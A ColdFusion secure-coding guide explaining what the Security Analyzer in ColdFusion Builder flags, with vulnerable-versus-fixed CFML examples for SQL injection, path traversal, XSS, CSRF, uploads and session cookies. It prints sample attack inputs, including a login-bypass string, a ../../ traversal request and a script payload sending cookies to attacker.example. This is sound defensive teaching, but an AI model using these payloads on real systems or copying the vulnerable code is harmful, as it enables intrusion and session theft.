25 February 2016
The Security Analyzer scans your ColdFusion code and flags potential security flaws.
Here is a list of the top security vulnerabilities that the Security Analyzer catches:
SQL injection is widely used by attackers. With SQL injection, an attacker can bypass a login, read user details, learn table names, drop tables, and so on.
For example, suppose the userid URL parameter of a vulnerable login page is given the value 'admin' OR 1=1. The query
Select * from users where user = #URL.userid# and password = 'somepassword'
is interpreted as
Select * from users where user = 'admin' OR 1=1 and password = 'somepassword'
Because AND binds more tightly than OR, the condition is true for the admin row whatever password was supplied, and the attacker is logged in as admin.
In ColdFusion, use cfqueryparam for such values: the user-supplied data is bound as a query parameter instead of being spliced into the SQL text.
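The login query above in its vulnerable form beside the cfqueryparam fix, as an added example that is not code from the original page. It assumes a datasource named myDsn with a users table (columns user and password); the injected value shown in the comment is constructed.

```cfml
<!---
  Added example, not from the original page. Assumes a datasource "myDsn"
  with a users table that has user and password columns.
--->

<!--- VULNERABLE: the request parameter is pasted into the SQL text. --->
<cfquery name="login" datasource="myDsn">
    SELECT * FROM users
    WHERE user = #URL.userid# AND password = 'somepassword'
</cfquery>
<!---
  ?userid='admin' OR 1=1  gives
      WHERE user = 'admin' OR 1=1 AND password = 'somepassword'
  which, because AND binds tighter than OR, is
      user = 'admin' OR (1=1 AND password = 'somepassword')
  so the admin row is returned regardless of the password.

  Caveat: ColdFusion doubles single quotes in values interpolated inside a
  cfquery body, so this exact string payload only works where that escaping
  is bypassed (PreserveSingleQuotes) or the value sits in an unquoted
  numeric context such as  WHERE id = #URL.id#  with  ?id=1 OR 1=1.
  cfqueryparam closes both cases.
--->

<!--- FIXED: bind the values; they are sent as parameters, never as SQL text. --->
<cfquery name="login" datasource="myDsn">
    SELECT * FROM users
    WHERE user = <cfqueryparam value="#URL.userid#" cfsqltype="cf_sql_varchar" maxlength="64">
      AND password = <cfqueryparam value="#URL.password#" cfsqltype="cf_sql_varchar" maxlength="128">
</cfquery>

<!--- The same fix in cfscript, using queryExecute (ColdFusion 11 and later). --->
<cfscript>
login = queryExecute(
    "SELECT * FROM users WHERE user = :userid AND password = :password",
    {
        userid:   { value: url.userid,   cfsqltype: "cf_sql_varchar", maxlength: 64 },
        password: { value: url.password, cfsqltype: "cf_sql_varchar", maxlength: 128 }
    },
    { datasource: "myDsn" }
);
</cfscript>
```

The cfsqltype also rejects values of the wrong type (a string in a cf_sql_integer parameter raises an error before the query runs), and maxlength bounds what the database has to handle.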
Cross-site scripting (XSS) is another widely exploited vulnerability. XSS can be persistent (stored) or non-persistent (reflected). Using XSS, a hacker can perform the following:
Do not use untrusted input in file operations. A request such as
User request --> ?header=../../server-config.txt
uses the ../ sequences to escape the intended directory and read an arbitrary file (path traversal). Always validate the file path before passing it to cffile, cfdirectory, or their corresponding functions (FileRead, DirectoryList, and so on).
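A vulnerable file read driven by the ?header= parameter above, and a hardened version that allow-lists the name and confirms the resolved path stays inside the intended directory. This is an added example, not code from the original page; the ./headers directory and the Application.InvalidPath exception type are assumptions.

```cfml
<!--- Added example, not from the original page. Assumes a ./headers directory under the template. --->

<!--- VULNERABLE: ?header=../../server-config.txt resolves outside ./headers. --->
<cffile action="read"
        file="#expandPath('./headers/' & url.header)#"
        variable="contents">

<!--- HARDENED --->
<cfparam name="url.header" default="">

<!--- 1. Allow-list the shape of the name: no slashes, no dot-dot, only the extension we serve. --->
<cfif NOT reFind("^[A-Za-z0-9_\-]+\.txt$", url.header)>
    <cfthrow type="Application.InvalidPath" message="Invalid header name">
</cfif>

<!--- 2. Canonicalise both paths (java.io.File resolves ./, ../ and symlinks) and check containment. --->
<cfset baseDir = createObject("java", "java.io.File")
                    .init(expandPath("./headers"))
                    .getCanonicalPath()>
<cfset target  = createObject("java", "java.io.File")
                    .init(baseDir, url.header)
                    .getCanonicalPath()>

<cfif left(target, len(baseDir) + 1) NEQ baseDir & server.separator.file>
    <cfthrow type="Application.InvalidPath" message="Path escapes the headers directory">
</cfif>

<cfif NOT fileExists(target)>
    <cfthrow type="Application.InvalidPath" message="No such header">
</cfif>

<cffile action="read" file="#target#" variable="contents">
```

The regular expression alone already blocks the traversal; the canonical-path check is the defence in depth that still holds if the allow-list is later loosened (for example to permit subdirectories). The same two checks apply to cfdirectory and to cffile actions other than read.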
In ColdFusion, encode every variable with the encoding function that matches the context it is written into (EncodeForHTML, EncodeForHTMLAttribute, EncodeForJavaScript, EncodeForURL, and so on) before sending it as output.
The cfhtmltopdf tag introduced in ColdFusion 11 provides powerful HTML rendering, powered by WebKit, to produce PDF files. Because the HTML is rendered on the server rather than in the user's browser, exercise the same caution when placing variables in the PDF document: unencoded input becomes HTML that the server itself renders.
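A reflected XSS in its vulnerable form beside the context-specific encoding functions, including the same encoding applied inside a cfhtmltopdf body. This is an added example, not code from the original page; the url.q and url.customer parameters, the report.pdf destination and the attacker URL in the comment are constructed for illustration.

```cfml
<!--- Added example, not from the original page. Request parameters url.q and url.customer are assumed. --->
<cfparam name="url.q" default="">
<cfparam name="url.customer" default="">

<!--- VULNERABLE: the search term is reflected into the page unencoded.
      ?q=<script>location='https://attacker.example/?c='+document.cookie</script>
      is executed in every victim's browser who follows that link. --->
<p>Results for: <cfoutput>#url.q#</cfoutput></p>

<!--- HARDENED: pick the encoder for the context the value lands in. --->
<cfoutput>
    <!--- HTML body text --->
    <p>Results for: #encodeForHTML(url.q)#</p>

    <!--- Quoted attribute value --->
    <input type="text" name="q" value="#encodeForHTMLAttribute(url.q)#">

    <!--- Query-string component of a URL --->
    <a href="/search.cfm?q=#encodeForURL(url.q)#">Search again</a>

    <!--- Inside a JavaScript string literal --->
    <script>var lastQuery = "#encodeForJavaScript(url.q)#";</script>
</cfoutput>

<!--- Server-side rendering: the PDF body is HTML too, so encode there as well. --->
<cfhtmltopdf destination="#expandPath('./report.pdf')#" overwrite="true">
    <cfoutput>
        <h1>Report for #encodeForHTML(url.customer)#</h1>
        <p>Query: #encodeForHTML(url.q)#</p>
    </cfoutput>
</cfhtmltopdf>
```

Using EncodeForHTML everywhere is not enough: inside a script block or an href the browser decodes a different grammar, which is why each context has its own function.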
Cross-site request forgery (CSRF) vulnerabilities occur when an attacker tricks an authenticated user into clicking a URL, or embeds a URL in a page that the authenticated user's browser requests automatically, so that the request is performed with the victim's session.
In ColdFusion, we recommend using CSRFGenerateToken together with CSRFVerifyToken to prevent this attack: embed a token in every state-changing form and reject requests whose token does not verify.
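The token round-trip with CSRFGenerateToken and CSRFVerifyToken, as an added example that is not code from the original page. It assumes session management is enabled in Application.cfc; the transfer.cfm action page, the transferFunds key and the form fields are assumptions.

```cfml
<!--- Added example, not from the original page. Requires this.sessionManagement = true in Application.cfc. --->

<!--- form.cfm: generate a token bound to this session and to the "transferFunds" key. --->
<cfset token = CSRFGenerateToken("transferFunds")>
<cfoutput>
<form method="post" action="transfer.cfm">
    <input type="hidden" name="csrfToken" value="#encodeForHTMLAttribute(token)#">
    <label>Amount <input type="text" name="amount"></label>
    <button type="submit">Transfer</button>
</form>
</cfoutput>

<!--- transfer.cfm: refuse to act unless the token that came back verifies for the same key.
      A forged cross-site request cannot read the victim's page, so it cannot supply the token. --->
<cfparam name="form.csrfToken" default="">
<cfparam name="form.amount" default="0">

<cfif NOT CSRFVerifyToken(form.csrfToken, "transferFunds")>
    <cfheader statuscode="403" statustext="Forbidden">
    <cfoutput>Request rejected: missing or invalid CSRF token.</cfoutput>
    <cfabort>
</cfif>

<!--- ...token verified: perform the transfer for form.amount here... --->
```

Passing the same key to both functions lets one session hold distinct tokens for distinct actions; calling CSRFGenerateToken with forceNew set to true issues a fresh token for each form if a per-request token is wanted.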
Validate both the file path and the file type of uploads. The accept attribute of cffile on its own is not reliable, because the MIME type is supplied by the client and can be changed; set the strict attribute so that ColdFusion checks the file content against the accepted types.
After the upload, use the functions IsImageFile, IsPDFFile, IsSpreadsheetFile, and FileGetMimeType to verify that the stored file really is of the type you expect.
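An image upload that combines the strict attribute with a content check on the stored file, as an added example that is not code from the original page. The photo form field, the ./uploads directory and the Application.InvalidUpload exception type are assumptions.

```cfml
<!--- Added example, not from the original page. Assumes a multipart form with a "photo" field
      and an ./uploads directory outside the web root that only the application reads. --->

<!--- strict="true": the file content is checked against the accept list, not just the
      client-declared Content-Type. The upload lands in the temp directory first. --->
<cffile action="upload"
        filefield="photo"
        destination="#getTempDirectory()#"
        accept="image/jpeg,image/png"
        strict="true"
        nameconflict="makeunique"
        result="upload">

<cfset uploaded = upload.serverDirectory & server.separator.file & upload.serverFile>

<!--- Second, independent check on the stored bytes: is it really an image, and is the
      content-derived MIME type (FileGetMimeType with strict=true) one we allow? --->
<cfif NOT isImageFile(uploaded)
      OR NOT listFindNoCase("image/jpeg,image/png", fileGetMimeType(uploaded, true))>
    <cffile action="delete" file="#uploaded#">
    <cfthrow type="Application.InvalidUpload" message="Only JPEG or PNG images are accepted">
</cfif>

<!--- Never reuse the client's file name for the final path: generate one ourselves
      and keep the extension that matches the verified type. --->
<cfset finalName = createUUID() & "." & lCase(upload.serverFileExt)>
<cffile action="move"
        source="#uploaded#"
        destination="#expandPath('./uploads/' & finalName)#">
```

For PDF and spreadsheet uploads the same pattern applies with IsPDFFile or IsSpreadsheetFile in place of IsImageFile; the point is that the decision is made on the bytes that were actually written, not on anything the client sent.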
If a cookie contains sensitive information (for example, session identifiers), send it only over a secure transport: enable the secure attribute so that the browser never transmits it over plain HTTP.
GET is less secure than POST because the data sent is part of the URL. Do not use GET when sending passwords or other sensitive information: URLs are bookmarked, logged and kept in browser history, so anyone with access to them can later read the sensitive data.
Passing CFID and CFToken as URL parameters is a security risk, because the session identifiers then appear in logs, bookmarks and Referer headers. Set addtoken to false on cflocation so that they are not appended to redirect URLs.
Avoid creating unnamed applications: always give the application a name (this.name in Application.cfc, or the name attribute of cfapplication).
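The settings from the last four points in one place, as an added example that is not code from the original page: a named Application.cfc that marks the session cookie secure, a page that sends a password by POST and sets its own cookie with the secure attribute, and a redirect that does not append CFID/CFTOKEN. The application name secureApp, the login.cfm and home.cfm pages and the prefs cookie are assumptions.

```cfml
<!--- Added example, not from the original page. Two files are shown; the
      file names and the application name are assumptions. --->

<!--- File: Application.cfc --->
component {
    // A named application: unnamed applications are flagged by the analyzer.
    this.name = "secureApp";
    this.sessionManagement = true;
    this.sessionTimeout = createTimeSpan(0, 0, 30, 0);
    // CFID/CFTOKEN carry the session: only ever send them over HTTPS.
    this.sessionCookie = { secure: true };
}

<!--- File: login.cfm --->
<!--- Weak: the password would travel in the query string, so it ends up in
      logs, history and bookmarks.
      <form method="get" action="login.cfm"> ... --->

<!--- Corrected: POST keeps the credential in the request body. --->
<cfoutput>
<form method="post" action="login.cfm">
    <label>User <input type="text" name="userid"></label>
    <label>Password <input type="password" name="password"></label>
    <button type="submit">Log in</button>
</form>
</cfoutput>

<cfif structKeyExists(form, "password")>
    <!--- ...authenticate form.userid / form.password here... --->

    <!--- Weak: <cfcookie name="prefs" value="..."> is sent over plain HTTP too.
          Corrected: the secure attribute restricts it to HTTPS. --->
    <cfcookie name="prefs" value="theme=dark" secure="true" expires="30">

    <!--- Weak: <cflocation url="home.cfm"> appends ?CFID=...&CFTOKEN=... by default.
          Corrected: addtoken="false" keeps the session identifiers out of the URL. --->
    <cflocation url="home.cfm" addtoken="false">
</cfif>
```

Once this.sessionCookie is set in Application.cfc the session identifiers travel only in the secure cookie, so addtoken="false" costs nothing: the browser already sends the session with the redirected request.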
To run Security Analyzer from ColdFusion Builder (2016 release):
RDS must be enabled on the ColdFusion server for this tool to run.
Right-click the folder or file you want to scan and then click Run Security Analyzer.
A notification appears when the scan is complete.
The pane at the bottom lists all the issues found by the scan, categorized by vulnerability type; you can drill down further to the error or warning level. The section on the right suggests a fix for the selected vulnerability.
Click any error to go to the exact location in the corresponding cfm file.
To export the error report, click Export.
The report is in a graphical format. A sample is shown below: